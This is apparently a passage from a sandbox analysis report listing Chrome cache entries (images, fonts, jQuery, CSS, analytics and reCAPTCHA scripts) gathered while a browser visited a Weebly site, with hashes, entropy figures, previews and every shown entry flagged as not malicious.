SHA-256:	20BD1DFFD70CA5F277F5767EB399BC959945F4961C27CFC2B474ADE72D03AB0B
SHA-512:	95F00D873DCE1B7E14CDB728FCFC1A85B13257343854F3011055893A49D4245EC9AAA848D471A1A1B32A58AF3059DD54298A65A98147ECCBF0B0536D938D54E0
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...q...m......j.0...TIDATx...TV...l.V.j^N H.).(N...j.]+-.4.L3..V."I...S.J...a..(..!2...C.A@.y...{..\|AZ..w..Z{...s.=.w.>.... .Y.u..... ....@....]..@...".Q..@...EEN..CC.....?.'..]... ....)Aab"...!f.#.....%.L.Cg.......O...c...=.+IKE....8{&\|...GoS.......@......e..B.....t..%....T#7"...V.{...[.@D'-...,.8~.wsS.(P... ..!3(.......D.!.......I.?.g...:..F r.Y.q...G,.(.... .\K..u..p.32.@..D~!n.Q[6......5..#...\.\|-.{1@..5..EE<.r..9.[ j.bmy9.=..{. 2.@.....Z....).dd..E...i..b.<^....u=....D\?./.[o....>^..<.m.5@.......m_#Y.s!..yS .V4.....93.k]p...9....~.................Z...Wq~.......*.....R........3'.;j.....u.....ik...F..'.m.Z....NL.....i.U6J.J.23....Lp..3.@v....d......cFB.B..'O..lY44..2$.{.t&.[..... ....FMi))..GJ3C.g.UV.u.......bij..>].:.w...H..["~..:6.......&A.z7@L.qw...n(.d..&..,D..K$....OI.....Q..9.......-..V!....p..W..V!V..#...p73..Z.X.....oh..u........9:....B....T.Z.....bt..S..C<u.$...agk'.Fjog.....D.ggt..>t....s.=x.'`ii..gc...X.j.

Chrome Cache Entry: 150

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	unknown
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 151

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 44 x 71, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	61
Entropy (8bit):	4.035372245524404
Encrypted:	false
SSDEEP:
MD5:	AA61E39E3EF5237C4FC35256C7CA7E19
SHA1:	01B66D2891F692FFB4524FCBE5DE2924D21B087A
SHA-256:	12273526B7D9CDD929CB53D4A56665A7F7A5DBB2D11631C231E84B0357621BB6
SHA-512:	F7E383DD42CB5993553974AAE9AB5CF978C57D3EC585D6B38ECFAD73D1407B6D0C3F7F2D40908E2FC52676E7D7683FF8E23380BB57128C1C09CA2845400BA76E
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...,...G.......2.....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 152

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	exported SGML document, ASCII text, with very long lines (1630)
Category:	dropped
Size (bytes):	7160
Entropy (8bit):	4.819263409497788
Encrypted:	false
SSDEEP:
MD5:	AE81AB7069097A055829FB9919258138
SHA1:	7DC529F16FB595BBBFC5937ADFE1D0A5CF563F8A
SHA-256:	5A630B41E7C3D34392BCB150A5731B6261BC6314D71D5DB8407A646AF15BF8AF
SHA-512:	923F0E92ED682F638ECA768065630AD26195F03CFD54BA235531C50D587321E45D0E0000E811F943557BA08D9C8A21A3F4B430433370C28C456ACD6B094C63DE
Malicious:	false
Reputation:	unknown
Preview:	// Gets converted to _W.Weebly = window.Weebly \|\| {};.Weebly.templates = {...'search/filter/search-facet-color': "<li class=\"wsite-search-facet wsite-search-facet-color\">\n\t<h3>{{facet_name}}<\/h3>\n\t<form name=\"{{column_name}}\">\n\t\t<ul class=\"wsite-search-facet-entries clearfix\">\n\t\t\t{{#facet_entries}}\n\t\t\t\t<li>\n\t\t\t\t\t<label title=\"{{name}}\" style=\"background-color:{{display_value}};\" {{#active}}class=\"active\"{{\/active}}>\n\t\t\t\t\t\t<input type=\"checkbox\" class=\"w-input-offscreen\" name=\"{{filter_text}}\" value=\"1\" tabindex=\"-1\" \/>\n\t\t\t\t\t<\/label>\n\t\t\t\t<\/li>\n\t\t\t{{\/facet_entries}}\n\t\t<\/ul>\n\t<\/form>\n<\/li>\n",...'search/filter/search-facet-checkbox': "<li class=\"wsite-search-facet wsite-search-facet-checkbox\">\n\t<h3>{{facet_name}}<\/h3>\n\t<form name=\"{{column_name}}\">\n\t\t<ul class=\"wsite-search-facet-entries\">\n\t\t\t{{#facet_entries}}\n\t\t\t\t<li>\n\t\t\t\t\t<label>\n\t\t\t\t\t\t<input type=\"checkbox\" name=\"{{f

Chrome Cache Entry: 155

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	TrueType Font data, 16 tables, 1st "GPOS", 26 names, Macintosh, Copyright \251 2004 - 2007 Linotype GmbH, www.linotype.com. All rights reserved. This font softw
Category:	downloaded
Size (bytes):	39185
Entropy (8bit):	5.932555350950847
Encrypted:	false
SSDEEP:
MD5:	98F6DACDE86EBBAAC7CC62B34A6E54CF
SHA1:	D232A9249B6F39E7D35CE6A555E070987357ACC9
SHA-256:	65032D5699BF3D4DEB4313AA4D1BB8375053AC7E93DFB4BF631CE9261DA20C2B
SHA-512:	3F15D8CAAE0C6A911AA8507CD33AAC8ACB99D27D4F19D9B210F1AD115FDD8440741D4E18531BD223BC1E6EA2C7CD95C4904EFB25F42B0CFFDF8A4A550357F66A
Malicious:	false
Reputation:	unknown
URL:	https://simatantincendi.weebly.com/files/theme/fonts/46cf1067-688d-4aab-b0f7-bd942af6efd8.ttf?1734018525
Preview:	............GPOS............LINO............OS/2e..........`cmap..... 4....cvt .z....!.....fpgmc.....".....gasp......-.....glyf.g....-...X.head...........6hhea.Y.........$hmtx..,........xloca.'w....t...\|maxp.3......... name<!.F........post...2....... prepf..v.......L.......d....latn..."..AFK .*DEU .2NLD .:ROM .BTRK .J..................................................kern.&kern.,kern.2kern.8kern.>kern.D.............................................................................V.p.v.\|.v.v...............................'.).2.3.7.8.9.:.<.}.................m...................................................................................Y...........................L.$.6.:.....<...................................................................................................................<......................................................................................................................................................................................................

Chrome Cache Entry: 157

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1305)
Category:	dropped
Size (bytes):	46274
Entropy (8bit):	5.48786904450865
Encrypted:	false
SSDEEP:
MD5:	E9372F0EBBCF71F851E3D321EF2A8E5A
SHA1:	2C7D19D1AF7D97085C977D1B69DCB8B84483D87C
SHA-256:	1259EA99BD76596239BFD3102C679EB0A5052578DC526B0452F4D42F8BCDD45F
SHA-512:	C3A1C74AC968FC2FA366D9C25442162773DB9AF1289ADFB165FC71E7750A7E62BD22F424F241730F3C2427AFFF8A540C214B3B97219A360A231D4875E6DDEE6F
Malicious:	false
Reputation:	unknown
Preview:	(function(){var E;var g=window,n=document,p=function(a){var b=g._gaUserPrefs;if(b&&b.ioo&&b.ioo()\|\|a&&!0===g["ga-disable-"+a])return!0;try{var c=g.external;if(c&&c._gaUserPrefs&&"oo"==c._gaUserPrefs)return!0}catch(f){}a=[];b=n.cookie.split(";");c=/^\sAMP_TOKEN=\s(.?)\s$/;for(var d=0;d<b.length;d++){var e=b[d].match(c);e&&a.push(e[1])}for(b=0;b<a.length;b++)if("$OPT_OUT"==decodeURIComponent(a[b]))return!0;return!1};var q=function(a){return encodeURIComponent?encodeURIComponent(a).replace(/$/g,"%28").replace(/$/g,"%29"):a},r=/^(www\.)?google(\.com?)?(\.[a-z]{2})?$/,u=/(^\|\.)doubleclick\.net$/i;function Aa(a,b){switch(b){case 0:return""+a;case 1:return 1a;case 2:return!!a;case 3:return 1E3a}return a}function Ba(a){return"function"==typeof a}function Ca(a){return void 0!=a&&-1<(a.constructor+"").indexOf("String")}function F(a,b){return void 0==a\|\|"-"==a&&!b\|\|""==a}function Da(a){if(!a\|\|""==a)return"";for(;a&&-1<" \n\r\t".indexOf(a.charAt(0));)a=a.substring(1);for(;a&&-1<" \n\r\t".i

Chrome Cache Entry: 159

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format, TrueType, length 20709, version 1.0
Category:	downloaded
Size (bytes):	20710
Entropy (8bit):	7.980357634369797
Encrypted:	false
SSDEEP:
MD5:	9DF5EFADCD24B83511F3C339178210D8
SHA1:	74F67081083EBD94979F50E681DF20BFBDC4CD8D
SHA-256:	0D887FC553F2B9A6488C8BBDEB38D0E70E2DA58D5BB34161D32F683AF096FDB8
SHA-512:	4911D0B54312B32C598018BA42968EFBC269D2DD5FE6CA79BB621EF97CC837559AFE44753FB1425AA23B380CE6733EC534027C2A890C98415DAA49EDD61F0588
Malicious:	false
Reputation:	unknown
URL:	https://simatantincendi.weebly.com/files/theme/fonts/1e9892c0-6927-4412-9874-1b82801ba47a.woff?1734018525
Preview:	wOFF......P...............MX................GPOS...l............LINO...$............OS/2...8...X...`e...cmap..............cvt ...(...N.....z..fpgm...x........c...gasp...h............glyf...p..3..X..g..head..B....6...6....hhea..B........$.Y..hmtx..B........x..,.loca..D....E...\|.'w.maxp..GD... ... .3..name..Gd........<!.Fpost..K`....... ...2prep..Kt.......Lf..vx..YKlTU....-...P(..P.......J.....-h.\|,.l.a%..8...ta0.BLE.D...& R.]..ac`..jV.........;..C.^.s..s.=....+.<.ex.W......D..Q.y..7......{....^...{.X..0....g.~..g.~..g...}.h..E..){..$....13.j.R>.s.)......mJ[.c.....).....#8.op.?.........hB..........4&..=...<.c......>...G.....+.Y..r\..,.F..9.Q......h.Wj...........c....,d...%.:l....4.F...![e....:n......N...g....\.?n.......P1D.G...a.zh..\).u.2...E...1..<K;-.~....#..r.j.b(dO.....8}...M.S.=.....%.H.-...(U.0.o".W....uH;V....zUWV.N.Y.y._..Lc....a..N.. e...C..-2FdW...5.<.E.f5.W..y..N3.:..'Y....ejv...M.5..^!\|...1F.......:.B...1...L^.D..V..9i.Bj.0s..c..7.

Chrome Cache Entry: 160

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32147)
Category:	downloaded
Size (bytes):	480909
Entropy (8bit):	5.418878253776284
Encrypted:	false
SSDEEP:
MD5:	016FFAE66513FCAE583BCC64A0B66869
SHA1:	CD2CCF7CC47BD6ADBC1FB46F8A88D610824F7037
SHA-256:	55F966D09AFC4A653A1F26B57E57412D5C42191D5692157D94110B23CA74C9D2
SHA-512:	0BEE2BCC0C4DED18A2DEB9B811234C555FA4D2F5D061A853C1443B6AFCA7AF813E396668AA7543586ECB9EFB8DA901CF3FAC33E396EB85D48B84D5F2CB8B963A
Malicious:	false
Reputation:	unknown
URL:	https://cdn2.editmysite.com/js/site/main.js?buildTime=1733963355
Preview:	(function(e){var t=window["publishedWBJP"];window["publishedWBJP"]=function o(s,a){var l,u,c=0,d=[];for(;c<s.length;c++){u=s[c];if(n[u])d.push.apply(d,n[u]);n[u]=0}for(l in a){if(Object.prototype.hasOwnProperty.call(a,l)){e[l]=a[l]}}if(t)t(s,a);while(d.length)d.shift().call(null,r);if(a[0]){i[0]=0;return r(0)}};var i={};var n={2:0};function r(t){if(i[t])return i[t].exports;var n=i[t]={exports:{},id:t,loaded:false};e[t].call(n.exports,n,n.exports,r);n.loaded=true;return n.exports}r.e=function e(t,i){if(n[t]===0)return i.call(null,r);if(n[t]!==undefined){n[t].push(i)}else{n[t]=[i];var o=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.type="text/javascript";s.charset="utf-8";s.async=true;s.src=r.p+""+{11:"5ab2b9565867ea666fb8",12:"616c4dd0568c07183a5d",13:"392868449bcd750dc40a",14:"959616cc5e24d1c02d25",15:"b6353cc0e423d7a50e8c",16:"054f225d281471b09455",17:"2e90ceda1aa59119b0b5",18:"afaef63f10fcebc93d78"}[t]+".js";o.appendChild(s)}};r.m=e;r.c=i;r.p="http

Chrome Cache Entry: 161

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 12708, version 1.0
Category:	downloaded
Size (bytes):	12708
Entropy (8bit):	7.983224716373465
Encrypted:	false
SSDEEP:
MD5:	B4A68B1E743EE317EAAF0BBADD131571
SHA1:	F24F7823D4E3830C7CFA5BCB33733D2897C00F13
SHA-256:	DDC148B8A0A27B1449FDA6033F4A0DEFAC9BD43210117B50D5D7AD1EDA09F394
SHA-512:	B3BF2523C9CF0ED55365FF6F03375512D478239297A2AF99B839F15D59E49094B03E085FCA8918FAA75B928FE1531376070018EA5FDB07C3E8743E6253A14ED7
Malicious:	false
Reputation:	unknown
URL:	https://cdn2.editmysite.com/fonts/Montserrat/regular.woff2
Preview:	wOF2......1.......{...1D.........................v..H..4.`?STATH........H.+..@..6.$..\|. ..\|. ...wk..Q.G.V.%..+GE).}A..8.........n.FB=..#..5.j...=.....g8..!.........1tQ..T.d.....'..A.fU..,..:b..E....,..\|........"~F..@.\|..#"..../O.?....}....WG-.H.x..Y.DB.3..v3. .V<.'!....i}.u.P...O\.W...7...V.d.U.....dXx.......1..}\|....\......5oU...5z..U..Ycl.>.\|..$d.a~....S.ku...Z.H.IHir.`E.......@...........J..z..u..W........^......8<.. 9#.}.....`0XbA.Y...A>......b...)..H.9#...3&.>.^..A. .PY..#....c.......r.e...kGL....6..M...D.g1...}.....E..ZC-.YNs......;..=.r).....H. A....cK..e.}......v.....`...LH.r.._ZD.PD...N,"^""Y:"S..P%..PD...QF#.9.AP..D...V..0W]....F.......Zx.O=b.....MB...........Q...............s..C.c.Sn.......`...Y..p..R...........$Q...S..yTwC<O..s..X.]I.#7 .....4....1_.<.;~.dp"4.F.1DsaK..F......X.$?%.w..<&..Z...J.m.I[....0y.^R....H..u.R..\......2.....4.$.0N.cn.c..x...N....$...!....(B..2:......'i.b..1.4^.j..x`H.........A.A...x.E..vG...L..@..6.P..E

Chrome Cache Entry: 162

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1061)
Category:	downloaded
Size (bytes):	45361
Entropy (8bit):	5.096981874413924
Encrypted:	false
SSDEEP:
MD5:	B7D1A927DE28D880015442B3F836B22B
SHA1:	BBF80B25F18481E60BD68CC8713C27E1213DBB76
SHA-256:	8EE433320EBAE0D3E7CB9BD3BCFF7C96BB85106824A3B8B26D92919E45418A8C
SHA-512:	1260D9AE81FBE5E35B2B19822C411D7436E18CFDE6722763C0979258D8A4413A908C391F4F3AF31549646ADB26FF3836EC8C1754C0F451A4DDBB8360A75D7808
Malicious:	false
Reputation:	unknown
URL:	https://simatantincendi.weebly.com/files/main_style.css?1734018525
Preview:	ul, ol, li, h1, h2, h3, h4, h5, h6, pre, form, body, html, div.paragraph, blockquote, fieldset, input { margin: 0; padding: 0; }.ul, ol, li, h1, h2, h3, h4, h5, h6, pre, form, body, html, p, blockquote, fieldset, input { margin: 0; padding: 0; }. .wsite-form-field input[type='text'], .wsite-form-field input[type='email'], .wsite-form-field textarea, .wsite-form-field select, .wsite-form-field input[type='radio'], .wsite-form-field input[type='checkbox'], .wsite-com-product-option-groups input[type='text'], .wsite-com-product-option-groups input[type='email'], .wsite-com-product-option-groups textarea, .wsite-com-product-option-groups select, .wsite-com-product-option-groups input[type='radio'], .wsite-com-product-option-groups input[type='checkbox'] { -webkit-box-shadow: none; -moz-box-shadow: none; box-shadow: none; -webkit-appearance: none; -moz-appearance: none; appearance: none; text-shadow: none; }. .wsite-form-field textarea, .wsite-com-product-option-groups textarea { resize: no

Chrome Cache Entry: 163

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1434), with no line terminators
Category:	downloaded
Size (bytes):	1434
Entropy (8bit):	5.766466434975035
Encrypted:	false
SSDEEP:
MD5:	9CC048508CA799E21AABA9E16E422C2A
SHA1:	6AFE4651C8EADA7CA6B1543ABA3E099633C4712E
SHA-256:	B2522C89AFA883BEF0AF1E6041EDC46545C40C83ECBF6315FFB46F1C4D6E54BD
SHA-512:	AC56BB358B09A2B454A39D0FA059408615F3AF8DDD0ABE6A4AD6AA84BFF39B3025AECB4E804B815E6358CFC11AF04FC0F62BD92F68B2CB0A715D730DF116EC96
Malicious:	false
Reputation:	unknown
URL:	https://www.google.com/recaptcha/api.js?_=1734357379054
Preview:	/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]\|\|{},N='grecaptcha';var gr=w[N]=w[N]\|\|{};gr.ready=gr.ready\|\|function(f){(cfg['fns']=cfg['fns']\|\|[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']\|\|[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)

Chrome Cache Entry: 164

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 199 x 97, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	9677
Entropy (8bit):	7.970815897911816
Encrypted:	false
SSDEEP:
MD5:	6E0F7AD31BF187E0D88FC5787573BA71
SHA1:	14E8B85CC32A01C8901E4AC0160582D29A45E9E6
SHA-256:	580EF6409E067A4EC4A427400C7D6216184869E2DA53343DF20753CC1F8A46CD
SHA-512:	A7078CAC9A5319904CB47E01A426EAE30A26D4AF5094438F41360396C280473B9C69748B7E7A603232DA9B6D0F7297FEFB04C434EB8098CC6F89F7183C44AB52
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.......a.....U.E.....PLTE................................."""..................$$$...&&&.......................................(((.....................................................................999...........}}}......222///......EEE.....Z6)...ooo.................ZZZ..........{.y[**......R<....................................mU3&....................IJIK+............sF3....Q0#............xrqr.o}M8........ttt^;.............tV.jLBBB.Z@,,,.~`OOO==<mB0..........s.}s666e=-B%....mN.fJxJ6..h..d.pd.qUSST..~aA4444......z.gX.VB.............xogffbbdXWWzcV??>............u^^^.......tfs\PrVG.aEkNA&..........U<K5+8..0.............~.k];;;.......lll.mX........{k_.^LS=3HI1!.(..........yxx][:D-$..............miA...xjrcZeI;5:......:( ~vL.......i.sh..].......j.........".IDATx..ml.q..uw......\......N...,-....(..[_0}AR...1..QZ.m:...TB......!C:.)...../....v5.o}.._....?....k'..?....s..e...&'.....(..#.$....(..x.i.X!..g....5<D\.lp..0.a.5...z.....t.

Chrome Cache Entry: 165

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2512)
Category:	dropped
Size (bytes):	75006
Entropy (8bit):	5.625174285042866
Encrypted:	false
SSDEEP:
MD5:	99BBE560926E583B8E99036251DEB783
SHA1:	8D81B73AE06F664F9D9E53DD5829A799BF434491
SHA-256:	648E766BF519673F9A90CC336CBECEDE80DCBE3419B43D36ECBB25D88F5584A3
SHA-512:	EE24915AA5C1C7C1DD571C07EFE46DFC173CB69D2DADC4C32891CE320EEF4FE1CFB614D9C212F16BFE2C83B29C6EEAB6C5A43F8E32D475DA8081B1E2D33869B4
Malicious:	false
Reputation:	unknown
Preview:	(function e(b,g,d){function c(n,j){if(!g[n]){if(!b[n]){var i=typeof require=="function"&&require;if(!j&&i){return i(n,!0)}if(a){return a(n,!0)}var m=new Error("Cannot find module '"+n+"'");throw m.code="MODULE_NOT_FOUND",m}var h=g[n]={exports:{}};b[n][0].call(h.exports,function(l){var o=b[n][1][l];return c(o?o:l)},h,h.exports,e,b,g,d)}return g[n].exports}var a=typeof require=="function"&&require;for(var f=0;f<d.length;f++){c(d[f])}return c})({1:[function(require,module,exports){var JSON;if(!JSON){JSON={}}(function(){var global=Function("return this")(),JSON=global.JSON;if(!JSON){JSON={}}function f(n){return n<10?"0"+n:n}if(typeof Date.prototype.toJSON!=="function"){Date.prototype.toJSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear()+"-"+f(this.getUTCMonth()+1)+"-"+f(this.getUTCDate())+"T"+f(this.getUTCHours())+":"+f(this.getUTCMinutes())+":"+f(this.getUTCSeconds())+"Z":null.};String.prototype.toJSON=Number.prototype.toJSON=Boolean.prototype.toJSON=function(key){ret

Chrome Cache Entry: 166

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32089)
Category:	downloaded
Size (bytes):	92629
Entropy (8bit):	5.303443527492463
Encrypted:	false
SSDEEP:
MD5:	397754BA49E9E0CF4E7C190DA78DDA05
SHA1:	AE49E56999D82802727455F0BA83B63ACD90A22B
SHA-256:	C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
SHA-512:	8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
Malicious:	false
Reputation:	unknown
URL:	https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Preview:	/! jQuery v1.9.1 \| (c) 2005, 2012 jQuery Foundation, Inc. \| jquery.org/license.//@ sourceMappingURL=jquery.min.map./(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d\.\|)\d+(?:[eE][+-]?\d+\|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]\|#([\w-]))$/,C=/^<(\w+)\s\/?>(?:<\/\1>\|)$/,k=/^[\],:{}\s]$/,E=/(?:^\|:\|,)(?:\s\[)+/g,S=/\\(?:["\\\/bfnrt]\|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"\|true\|false\|null\|-?(?:\d+\.\|)\d+(?:[eE][+-]?\d+\|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener\|\|"load"===e.type\|\|"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)

Chrome Cache Entry: 167

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65483)
Category:	downloaded
Size (bytes):	93636
Entropy (8bit):	5.292860855150671
Encrypted:	false
SSDEEP:
MD5:	3576A6E73C9DCCDBBC4A2CF8FF544AD7
SHA1:	06E872300088B9BA8A08427D28ED0EFCDF9C6FF5
SHA-256:	61C6CAEBD23921741FB5FFE6603F16634FCA9840C2BF56AC8201E9264D6DACCF
SHA-512:	27D41F6CFB8596A183D8261509AEB39FCFFB3C48199C6A4CE6AB45381660C2E8E30E71B9C39163C78E98CEABC887F391B2D723EE5B92B6FBC81E48AC422E522B
Malicious:	false
Reputation:	unknown
URL:	https://cdn2.editmysite.com/js/jquery-1.8.3.min.js
Preview:	/! jQuery v1.8.3 jquery.com \| jquery.org/license /.(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e\|\|!e.parentNode\|\|e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t\|\|0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t,

Chrome Cache Entry: 168

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
Category:	downloaded
Size (bytes):	563851
Entropy (8bit):	5.221453271093944
Encrypted:	false
SSDEEP:
MD5:	12DD1E4D0485A80184B36D158018DE81
SHA1:	EB2594062E90E3DCD5127679F9C369D3BF39D61C
SHA-256:	A04B5B8B345E79987621008E6CC9BEF2B684663F9A820A0C7460E727A2A4DDC3
SHA-512:	F3A92BF0C681E6D2198970F43B966ABDF8CCBFF3F9BD5136A1CA911747369C49F8C36C69A7E98E0F2AED3163D9D1C5D44EFCE67A178DE479196845721219E12C
Malicious:	false
Reputation:	unknown
URL:	https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css
Preview:	@charset "UTF-8";/! @ms-mwf/mwf - v1.25.0+6321934 \| Copyright 2017 Microsoft Corporation \| This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.//! normalize.css v3.0.3 \| MIT License \| github.com/necolas/normalize.css

Chrome Cache Entry: 169

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format, TrueType, length 26288, version 0.0
Category:	downloaded
Size (bytes):	26288
Entropy (8bit):	7.984195877171481
Encrypted:	false
SSDEEP:
MD5:	D0263DC03BE4C393A90BDA733C57D6DB
SHA1:	8A032B6DEAB53A33234C735133B48518F8643B92
SHA-256:	22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
SHA-512:	9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
Malicious:	false
Reputation:	unknown
URL:	https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff
Preview:	wOFF......f........D........................OS/2...X...H...`JM.FVDMX.............^.qcmap..............9cvt ...4... .......fpgm...T.......Y...gasp...D............glyf...P..U5.......head..]....2...6...Chhea..]........$$...hmtx..]..........ye'loca..^............Gmaxp..`.... ... ./..name..`....8....]..Rpost..f........ .Q.wprep..f$........x...x.c`.Pf......:....Q.B3_dHc..`e.bdb... .`@..`......./9.\|...V...)00...-.Wx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.\|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0\|.>...O.g...E.2\|....o.w...C.1..~..._.o..08........?..0$........x...mL.U.............9.x.`[...&BF@X...V.h.Z..h......`n....[..U

Chrome Cache Entry: 170

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
